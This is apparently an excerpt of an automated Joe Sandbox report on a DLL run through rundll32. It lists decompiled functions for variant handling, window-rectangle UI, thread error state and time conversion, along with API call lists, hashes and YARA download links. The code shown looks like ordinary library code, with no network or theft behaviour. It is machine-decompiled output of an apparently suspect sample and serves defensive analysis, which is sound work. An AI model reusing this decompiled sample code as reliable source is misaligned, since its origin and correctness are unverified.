                                                                                                            • GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                                                            • FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                                                            • SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                                                              • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                                                              • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                                                            • FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1487844433-4125583295
                                                                                                            • Opcode ID: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                                                            • Instruction ID: 04c9e0168ef1b4a2d5000d056184ae8950552c627320cfc90ecd4b0af594dd98
                                                                                                            • Opcode Fuzzy Hash: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                                                            • Instruction Fuzzy Hash: F4F0C2326017269FE3225F648C49E463BE0EB017A2F104219F942CE1E1DFB5C8808794
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000ECE8 Relevance: 9.4, APIs: 6, Instructions: 384COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E1000ECE8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t155;
				signed int _t167;
				signed short _t168;
				intOrPtr* _t170;
				void* _t172;
				signed short _t181;
				signed short _t183;
				void* _t186;
				signed short _t189;
				signed short _t191;
				signed short _t196;
				signed short _t198;
				signed short _t207;
				long long* _t214;
				intOrPtr* _t218;
				void* _t220;
				void* _t226;
				void* _t229;
				intOrPtr* _t231;
				void* _t237;
				void* _t240;
				signed int _t243;
				signed short _t244;
				signed short _t245;
				signed short _t249;
				signed short _t253;
				intOrPtr* _t254;
				intOrPtr _t276;
				void* _t318;
				intOrPtr* _t326;
				void* _t327;
				signed long long _t335;

				_t318 = __edx;
				E10011BF0(0x1003b04c, _t327);
				_t155 =  *0x1004c470; // 0x6edecb8c
				 *((intOrPtr*)(_t327 - 0x10)) = _t155;
				 *(_t327 - 0x30) = 0;
				E10010592(_t327 - 0x40);
				_t321 =  *((intOrPtr*)(__ecx + 0x54));
				 *((intOrPtr*)(_t327 - 4)) = 0;
				E1000C8EB( *((intOrPtr*)(__ecx + 0x54)), __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x28);
				_t333 =  *((intOrPtr*)(_t327 - 0x28)) - 3;
				if( *((intOrPtr*)(_t327 - 0x28)) == 3 || E1000B5EA(_t321, _t333,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x26) == 0) {
					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					__imp__#9(_t327 - 0x40);
				} else {
					_t167 =  *(_t327 - 0x26) & 0x0000ffff;
					_t326 = __imp__#9;
					__eflags = _t167 - 0x81;
					if(__eflags > 0) {
						_t168 = _t167 - 0x82;
						__eflags = _t168;
						if(__eflags == 0) {
							goto L47;
						} else {
							_t181 = _t168 - 1;
							__eflags = _t181;
							if(__eflags == 0) {
								_t183 = E1000C669(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
								__eflags = _t183;
								if(_t183 != 0) {
									__eflags =  *(_t327 - 0x23);
									asm("fild qword [ebp-0x21]");
									if( *(_t327 - 0x23) > 0) {
										do {
											_t129 = _t327 - 0x23;
											 *_t129 =  *(_t327 - 0x23) - 1;
											__eflags =  *_t129;
											_t335 = _t335 *  *0x10040908;
										} while ( *_t129 != 0);
									}
									__eflags =  *(_t327 - 0x22);
									if( *(_t327 - 0x22) == 0) {
										_t335 = st0;
										asm("fchs");
										st1 = _t335;
									}
									 *(_t327 - 0x78) = _t335;
									 *((short*)(_t327 - 0x80)) = 5;
									 *((char*)(_t327 - 4)) = 0xe;
									E10010578(_t327 - 0x80, _t327 - 0x40, _t327 - 0x80);
									_t186 = _t327 - 0x80;
									goto L36;
								}
							} else {
								_t189 = _t181;
								__eflags = _t189;
								if(__eflags == 0) {
									_t191 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
									__eflags = _t191;
									if(_t191 != 0) {
										asm("fldz");
										 *(_t327 - 0x20) = _t335;
										 *((intOrPtr*)(_t327 - 0x18)) = 0;
										E1000B521(_t327 - 0x20,  *(_t327 - 0x30),  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff, 0, 0, 0);
										 *((short*)(_t327 - 0x70)) = 7;
										 *(_t327 - 0x68) =  *(_t327 - 0x20);
										 *((char*)(_t327 - 4)) = 0xf;
										E10010578(_t327 - 0x70, _t327 - 0x40, _t327 - 0x70);
										_t186 = _t327 - 0x70;
										goto L36;
									}
								} else {
									_t196 = _t189 - 1;
									__eflags = _t196;
									if(__eflags == 0) {
										_t198 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
										__eflags = _t198;
										if(_t198 != 0) {
											asm("fldz");
											 *(_t327 - 0x20) = _t335;
											 *((intOrPtr*)(_t327 - 0x18)) = 0;
											E1000B582( *(_t327 - 0x30) & 0x0000ffff,  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff);
											 *((short*)(_t327 - 0xb0)) = 7;
											 *(_t327 - 0xa8) =  *(_t327 - 0x20);
											 *((char*)(_t327 - 4)) = 0x10;
											E10010578(_t327 - 0xb0, _t327 - 0x40, _t327 - 0xb0);
											_t186 = _t327 - 0xb0;
											goto L36;
										}
									} else {
										__eflags = _t196 - 1;
										if(__eflags == 0) {
											_t207 = E1000C6BD(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
											__eflags = _t207;
											if(_t207 != 0) {
												_t214 = E1000C853(_t327 - 0x13c,  *((short*)(_t327 - 0x24)),  *(_t327 - 0x22) & 0x0000ffff,  *(_t327 - 0x20) & 0x0000ffff,  *(_t327 - 0x1e) & 0x0000ffff,  *(_t327 - 0x1c) & 0x0000ffff,  *(_t327 - 0x1a) & 0x0000ffff);
												 *((short*)(_t327 - 0xa0)) = 7;
												 *((long long*)(_t327 - 0x98)) =  *_t214;
												 *((char*)(_t327 - 4)) = 0x11;
												E10010578(_t327 - 0xa0, _t327 - 0x40, _t327 - 0xa0);
												_t186 = _t327 - 0xa0;
												goto L36;
											}
										}
									}
								}
							}
						}
					} else {
						if(__eflags == 0) {
							_t218 = E10006B11(_t327 + 0xc, __eflags);
							 *((char*)(_t327 - 4)) = 2;
							_t220 = E100105C5(_t327 - 0x120,  *_t218, 8);
							 *((char*)(_t327 - 4)) = 3;
							E10010578(_t220, _t327 - 0x40, _t220);
							 *_t326(_t327 - 0x120, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
							_t276 =  *((intOrPtr*)(_t327 + 0xc));
							goto L48;
						} else {
							__eflags = _t167 - 8;
							if(__eflags > 0) {
								__eflags = _t167 - 0xb;
								if(__eflags == 0) {
									_t226 = E100104C1(_t327 - 0x100,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 0xb);
									 *((char*)(_t327 - 4)) = 0xb;
									E10010578(_t226, _t327 - 0x40, _t226);
									_t186 = _t327 - 0x100;
									goto L36;
								} else {
									__eflags = _t167 - 0xc;
									if(__eflags == 0) {
										_t229 = E100105A5(_t327 - 0xf0, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
										 *((char*)(_t327 - 4)) = 1;
										E10010578(_t229, _t327 - 0x40, _t229);
										_t186 = _t327 - 0xf0;
										goto L36;
									} else {
										__eflags = _t167 - 0xf;
										if(_t167 > 0xf) {
											__eflags = _t167 - 0x11;
											if(__eflags <= 0) {
												_t231 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
												 *((short*)(_t327 - 0x60)) = 0x11;
												 *((char*)(_t327 - 0x58)) =  *_t231;
												 *((char*)(_t327 - 4)) = 6;
												E10010578(_t327 - 0x60, _t327 - 0x40, _t327 - 0x60);
												_t186 = _t327 - 0x60;
												goto L36;
											} else {
												__eflags = _t167 - 0x12;
												if(__eflags == 0) {
													goto L24;
												} else {
													__eflags = _t167 - 0x13;
													if(__eflags == 0) {
														goto L23;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									L47:
									_t170 = E1000E754(_t327 - 0x28, __eflags);
									 *((char*)(_t327 - 4)) = 4;
									_t172 = E100105C5(_t327 - 0x130,  *_t170, 8);
									 *((char*)(_t327 - 4)) = 5;
									E10010578(_t172, _t327 - 0x40, _t172);
									 *_t326(_t327 - 0x130, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
									_t276 =  *((intOrPtr*)(_t327 - 0x28));
									L48:
									__eflags = _t276 + 0xfffffff0;
									 *((char*)(_t327 - 4)) = 0;
									E100014B0(_t276 + 0xfffffff0, _t318);
								} else {
									_t243 = _t167;
									__eflags = _t243;
									if(__eflags == 0) {
										L24:
										_t237 = E100104C1(_t327 - 0x110,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 2);
										 *((char*)(_t327 - 4)) = 7;
										E10010578(_t237, _t327 - 0x40, _t237);
										_t186 = _t327 - 0x110;
										goto L36;
									} else {
										_t244 = _t243 - 1;
										__eflags = _t244;
										if(__eflags == 0) {
											L23:
											_t240 = E100104E8(_t327 - 0xe0,  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 3);
											 *((char*)(_t327 - 4)) = 8;
											E10010578(_t240, _t327 - 0x40, _t240);
											_t186 = _t327 - 0xe0;
											goto L36;
										} else {
											_t245 = _t244 - 1;
											__eflags = _t245;
											if(__eflags == 0) {
												 *((intOrPtr*)(_t327 - 0xb8)) =  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
												 *((short*)(_t327 - 0xc0)) = 4;
												 *((char*)(_t327 - 4)) = 9;
												E10010578(_t327 - 0xc0, _t327 - 0x40, _t327 - 0xc0);
												_t186 = _t327 - 0xc0;
												goto L36;
											} else {
												_t249 = _t245 - 1;
												__eflags = _t249;
												if(__eflags == 0) {
													 *((long long*)(_t327 - 0x88)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
													 *((short*)(_t327 - 0x90)) = 5;
													 *((char*)(_t327 - 4)) = 0xa;
													E10010578(_t327 - 0x90, _t327 - 0x40, _t327 - 0x90);
													_t186 = _t327 - 0x90;
													goto L36;
												} else {
													_t253 = _t249 - 1;
													__eflags = _t253;
													if(__eflags == 0) {
														_t254 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
														 *((short*)(_t327 - 0x50)) = 6;
														 *((intOrPtr*)(_t327 - 0x48)) =  *_t254;
														 *((intOrPtr*)(_t327 - 0x44)) =  *((intOrPtr*)(_t254 + 4));
														 *((char*)(_t327 - 4)) = 0xd;
														E10010578(_t327 - 0x50, _t327 - 0x40, _t327 - 0x50);
														_t186 = _t327 - 0x50;
														goto L36;
													} else {
														__eflags = _t253 - 1;
														if(__eflags == 0) {
															 *((long long*)(_t327 - 0xc8)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
															 *((short*)(_t327 - 0xd0)) = 7;
															 *((char*)(_t327 - 4)) = 0xc;
															E10010578(_t327 - 0xd0, _t327 - 0x40, _t327 - 0xd0);
															_t186 = _t327 - 0xd0;
															L36:
															 *((char*)(_t327 - 4)) = 0;
															 *_t326(_t186);
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					 *_t326(_t327 - 0x40);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t327 - 0xc));
				return E100117AE( *((intOrPtr*)(_t327 + 8)),  *((intOrPtr*)(_t327 - 0x10)));
			}



































                                                                                                            0x1000ece8
                                                                                                            0x1000eced
                                                                                                            0x1000ecf8
                                                                                                            0x1000ecff
                                                                                                            0x1000ed0b
                                                                                                            0x1000ed0e
                                                                                                            0x1000ed13
                                                                                                            0x1000ed1f
                                                                                                            0x1000ed22
                                                                                                            0x1000ed27
                                                                                                            0x1000ed2b
                                                                                                            0x1000ed46
                                                                                                            0x1000ed4f
                                                                                                            0x1000ed5a
                                                                                                            0x1000ed5a
                                                                                                            0x1000ed5e
                                                                                                            0x1000ed69
                                                                                                            0x1000ed6b
                                                                                                            0x1000efec
                                                                                                            0x1000efec
                                                                                                            0x1000eff1
                                                                                                            0x00000000
                                                                                                            0x1000eff7
                                                                                                            0x1000eff7
                                                                                                            0x1000eff7
                                                                                                            0x1000eff8
                                                                                                            0x1000f14b
                                                                                                            0x1000f150
                                                                                                            0x1000f152
                                                                                                            0x1000f158
                                                                                                            0x1000f15b
                                                                                                            0x1000f15e
                                                                                                            0x1000f160
                                                                                                            0x1000f160
                                                                                                            0x1000f160
                                                                                                            0x1000f160
                                                                                                            0x1000f163
                                                                                                            0x1000f163
                                                                                                            0x1000f160
                                                                                                            0x1000f16b
                                                                                                            0x1000f16e
                                                                                                            0x1000f170
                                                                                                            0x1000f172
                                                                                                            0x1000f174
                                                                                                            0x1000f174
                                                                                                            0x1000f176
                                                                                                            0x1000f179
                                                                                                            0x1000f186
                                                                                                            0x1000f18a
                                                                                                            0x1000f18f
                                                                                                            0x00000000
                                                                                                            0x1000f18f
                                                                                                            0x1000effe
                                                                                                            0x1000efff
                                                                                                            0x1000efff
                                                                                                            0x1000f000
                                                                                                            0x1000f0ef
                                                                                                            0x1000f0f4
                                                                                                            0x1000f0f6
                                                                                                            0x1000f100
                                                                                                            0x1000f106
                                                                                                            0x1000f116
                                                                                                            0x1000f119
                                                                                                            0x1000f11e
                                                                                                            0x1000f127
                                                                                                            0x1000f131
                                                                                                            0x1000f135
                                                                                                            0x1000f13a
                                                                                                            0x00000000
                                                                                                            0x1000f13a
                                                                                                            0x1000f006
                                                                                                            0x1000f006
                                                                                                            0x1000f006
                                                                                                            0x1000f007
                                                                                                            0x1000f08d
                                                                                                            0x1000f092
                                                                                                            0x1000f094
                                                                                                            0x1000f09e
                                                                                                            0x1000f0a1
                                                                                                            0x1000f0b1
                                                                                                            0x1000f0b4
                                                                                                            0x1000f0b9
                                                                                                            0x1000f0c5
                                                                                                            0x1000f0d5
                                                                                                            0x1000f0d9
                                                                                                            0x1000f0de
                                                                                                            0x00000000
                                                                                                            0x1000f0de
                                                                                                            0x1000f009
                                                                                                            0x1000f009
                                                                                                            0x1000f00a
                                                                                                            0x1000f019
                                                                                                            0x1000f01e
                                                                                                            0x1000f020
                                                                                                            0x1000f04a
                                                                                                            0x1000f04f
                                                                                                            0x1000f05a
                                                                                                            0x1000f06a
                                                                                                            0x1000f06e
                                                                                                            0x1000f073
                                                                                                            0x00000000
                                                                                                            0x1000f073
                                                                                                            0x1000f020
                                                                                                            0x1000f00a
                                                                                                            0x1000f007
                                                                                                            0x1000f000
                                                                                                            0x1000eff8
                                                                                                            0x1000ed71
                                                                                                            0x1000ed71
                                                                                                            0x1000efb5
                                                                                                            0x1000efc5
                                                                                                            0x1000efc9
                                                                                                            0x1000efd2
                                                                                                            0x1000efd6
                                                                                                            0x1000efe2
                                                                                                            0x1000efe4
                                                                                                            0x00000000
                                                                                                            0x1000ed77
                                                                                                            0x1000ed77
                                                                                                            0x1000ed7a
                                                                                                            0x1000ee87
                                                                                                            0x1000ee8a
                                                                                                            0x1000ef8a
                                                                                                            0x1000ef93
                                                                                                            0x1000ef97
                                                                                                            0x1000ef9c
                                                                                                            0x00000000
                                                                                                            0x1000ee90
                                                                                                            0x1000ee90
                                                                                                            0x1000ee93
                                                                                                            0x1000ef57
                                                                                                            0x1000ef60
                                                                                                            0x1000ef64
                                                                                                            0x1000ef69
                                                                                                            0x00000000
                                                                                                            0x1000ee99
                                                                                                            0x1000ee99
                                                                                                            0x1000ee9c
                                                                                                            0x1000eea2
                                                                                                            0x1000eea5
                                                                                                            0x1000ef1e
                                                                                                            0x1000ef25
                                                                                                            0x1000ef2b
                                                                                                            0x1000ef35
                                                                                                            0x1000ef39
                                                                                                            0x1000ef3e
                                                                                                            0x00000000
                                                                                                            0x1000eea7
                                                                                                            0x1000eea7
                                                                                                            0x1000eeaa
                                                                                                            0x00000000
                                                                                                            0x1000eeac
                                                                                                            0x1000eeac
                                                                                                            0x1000eeaf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000eeaf
                                                                                                            0x1000eeaa
                                                                                                            0x1000eea5
                                                                                                            0x1000ee9c
                                                                                                            0x1000ee93
                                                                                                            0x1000ed80
                                                                                                            0x1000ed80
                                                                                                            0x1000f197
                                                                                                            0x1000f1a5
                                                                                                            0x1000f1b5
                                                                                                            0x1000f1b9
                                                                                                            0x1000f1c2
                                                                                                            0x1000f1c6
                                                                                                            0x1000f1d2
                                                                                                            0x1000f1d4
                                                                                                            0x1000f1d7
                                                                                                            0x1000f1d7
                                                                                                            0x1000f1da
                                                                                                            0x1000f1dd
                                                                                                            0x1000ed86
                                                                                                            0x1000ed87
                                                                                                            0x1000ed87
                                                                                                            0x1000ed88
                                                                                                            0x1000eee6
                                                                                                            0x1000eefc
                                                                                                            0x1000ef05
                                                                                                            0x1000ef09
                                                                                                            0x1000ef0e
                                                                                                            0x00000000
                                                                                                            0x1000ed8e
                                                                                                            0x1000ed8e
                                                                                                            0x1000ed8e
                                                                                                            0x1000ed8f
                                                                                                            0x1000eeb5
                                                                                                            0x1000eec9
                                                                                                            0x1000eed2
                                                                                                            0x1000eed6
                                                                                                            0x1000eedb
                                                                                                            0x00000000
                                                                                                            0x1000ed95
                                                                                                            0x1000ed95
                                                                                                            0x1000ed95
                                                                                                            0x1000ed96
                                                                                                            0x1000ee5a
                                                                                                            0x1000ee60
                                                                                                            0x1000ee73
                                                                                                            0x1000ee77
                                                                                                            0x1000ee7c
                                                                                                            0x00000000
                                                                                                            0x1000ed9c
                                                                                                            0x1000ed9c
                                                                                                            0x1000ed9c
                                                                                                            0x1000ed9d
                                                                                                            0x1000ee21
                                                                                                            0x1000ee27
                                                                                                            0x1000ee3a
                                                                                                            0x1000ee3e
                                                                                                            0x1000ee43
                                                                                                            0x00000000
                                                                                                            0x1000ed9f
                                                                                                            0x1000ed9f
                                                                                                            0x1000ed9f
                                                                                                            0x1000eda0
                                                                                                            0x1000ede7
                                                                                                            0x1000edf1
                                                                                                            0x1000edf7
                                                                                                            0x1000edfa
                                                                                                            0x1000ee04
                                                                                                            0x1000ee08
                                                                                                            0x1000ee0d
                                                                                                            0x00000000
                                                                                                            0x1000eda2
                                                                                                            0x1000eda2
                                                                                                            0x1000eda3
                                                                                                            0x1000edb5
                                                                                                            0x1000edbb
                                                                                                            0x1000edce
                                                                                                            0x1000edd2
                                                                                                            0x1000edd7
                                                                                                            0x1000f079
                                                                                                            0x1000f07a
                                                                                                            0x1000f07d
                                                                                                            0x1000f07d
                                                                                                            0x1000eda3
                                                                                                            0x1000eda0
                                                                                                            0x1000ed9d
                                                                                                            0x1000ed96
                                                                                                            0x1000ed8f
                                                                                                            0x1000ed88
                                                                                                            0x1000ed80
                                                                                                            0x1000ed7a
                                                                                                            0x1000ed71
                                                                                                            0x1000f1e9
                                                                                                            0x1000f1f2
                                                                                                            0x1000f1f2
                                                                                                            0x1000f1fc
                                                                                                            0x1000f20d

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000ECED
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000ED4F
                                                                                                            • VariantClear.OLEAUT32(00000007), ref: 1000F07D
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000F1F2
                                                                                                              • Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580
                                                                                                              • Part of subcall function 1000B521: SystemTimeToVariantTime.OLEAUT32(?), ref: 1000B56F
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000F1D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$Clear$Time$CopyH_prologSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2075586698-0
                                                                                                            • Opcode ID: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
                                                                                                            • Instruction ID: ab9c67d837f040e6a8d2bcef4c04a3746811f2ad7d73440ecc3fc71fc0b20bfc
                                                                                                            • Opcode Fuzzy Hash: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
                                                                                                            • Instruction Fuzzy Hash: 3FE16D74D0055CEAEF15DBA0C890AFEB7B9FF08380F04409AF845A7195DB74AE49EB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10030B92 Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 100304C6: PeekMessageA.USER32(0000000F,00000000,0000000F,0000000F,00000000), ref: 10030507
                                                                                                              • Part of subcall function 100304C6: SetRectEmpty.USER32(?), ref: 10030528
                                                                                                              • Part of subcall function 100304C6: GetDesktopWindow.USER32 ref: 10030540
                                                                                                              • Part of subcall function 100304C6: LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                                                              • Part of subcall function 100304C6: GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                                                              • Part of subcall function 10028B90: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                                                              • Part of subcall function 10028B90: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                                                            • GetWindowRect.USER32 ref: 10030BDC
                                                                                                              • Part of subcall function 10028BC6: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                                                              • Part of subcall function 10028BC6: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                                                            • GetWindowRect.USER32 ref: 10030CA6
                                                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 10030D5E
                                                                                                              • Part of subcall function 1003033B: OffsetRect.USER32(?,?,?), ref: 10030372
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030704
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003070F
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003071A
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030725
                                                                                                              • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030A88
                                                                                                              • Part of subcall function 10030A77: SetCapture.USER32(?), ref: 10030A98
                                                                                                              • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030AA4
                                                                                                              • Part of subcall function 10030A77: GetMessageA.USER32 ref: 10030ABE
                                                                                                              • Part of subcall function 10030A77: DispatchMessageA.USER32 ref: 10030AF0
                                                                                                              • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030B4E
                                                                                                            • GetWindowRect.USER32 ref: 10030D79
                                                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 10030E61
                                                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 10030E74
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$OffsetWindow$Capture$InflateMessage$AddressHandleModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                                                            • String ID:
                                                                                                            • API String ID: 2136250054-0
                                                                                                            • Opcode ID: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                                                            • Instruction ID: 4b2599bdc0df74788382724407d7fba24e161278d0237bedf51c9f418cb1fd08
                                                                                                            • Opcode Fuzzy Hash: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                                                            • Instruction Fuzzy Hash: E3B14876901618AFCF01CFA4C891DEE7BBAEF4A311F014594FD05AF256D672AE84CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100134E7 Relevance: 9.2, APIs: 6, Instructions: 197COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E100134E7(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t74;
				char _t75;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr _t101;
				intOrPtr _t102;
				char _t105;
				signed int _t111;
				intOrPtr _t113;
				intOrPtr _t118;
				intOrPtr* _t121;
				void* _t127;
				intOrPtr _t128;
				intOrPtr* _t129;
				intOrPtr _t132;
				void* _t134;
				intOrPtr _t136;
				intOrPtr _t138;

				_t118 = __edx;
				_t121 = _a4;
				_t101 =  *((intOrPtr*)(_t121 + 4));
				_t62 =  *_t121;
				_t132 = _t101;
				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
					L29:
					_t63 = 0;
					__eflags = 0;
					goto L30;
				} else {
					_t134 = _t101 - 0x1000;
					if(_t134 > 0) {
						goto L29;
					}
					if(_t134 < 0) {
						L6:
						_push(_t127);
						E100193FB(_t127, _t135);
						_t102 =  *((intOrPtr*)(_t121 + 4));
						_t136 = _t102;
						_t128 =  *_t121;
						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
							_t65 = E10018BEF(_t121);
							__eflags =  *0x1004cdec; // 0x1
							_t129 = _t65;
							if(__eflags == 0) {
								L15:
								asm("cdq");
								_t67 =  *0x1004cde8; // 0x7080
								_t123 = _t118;
								asm("cdq");
								_t105 =  *_t129 - _t67;
								__eflags = _t105;
								asm("sbb edi, edx");
								_v12 = _t105;
								_v8 = _t118;
								L16:
								_t68 = E10019490(_t105, _t123, 0x3c, 0);
								__eflags = _t68;
								 *_t129 = _t68;
								if(_t68 < 0) {
									 *_t129 = _t68 + 0x3c;
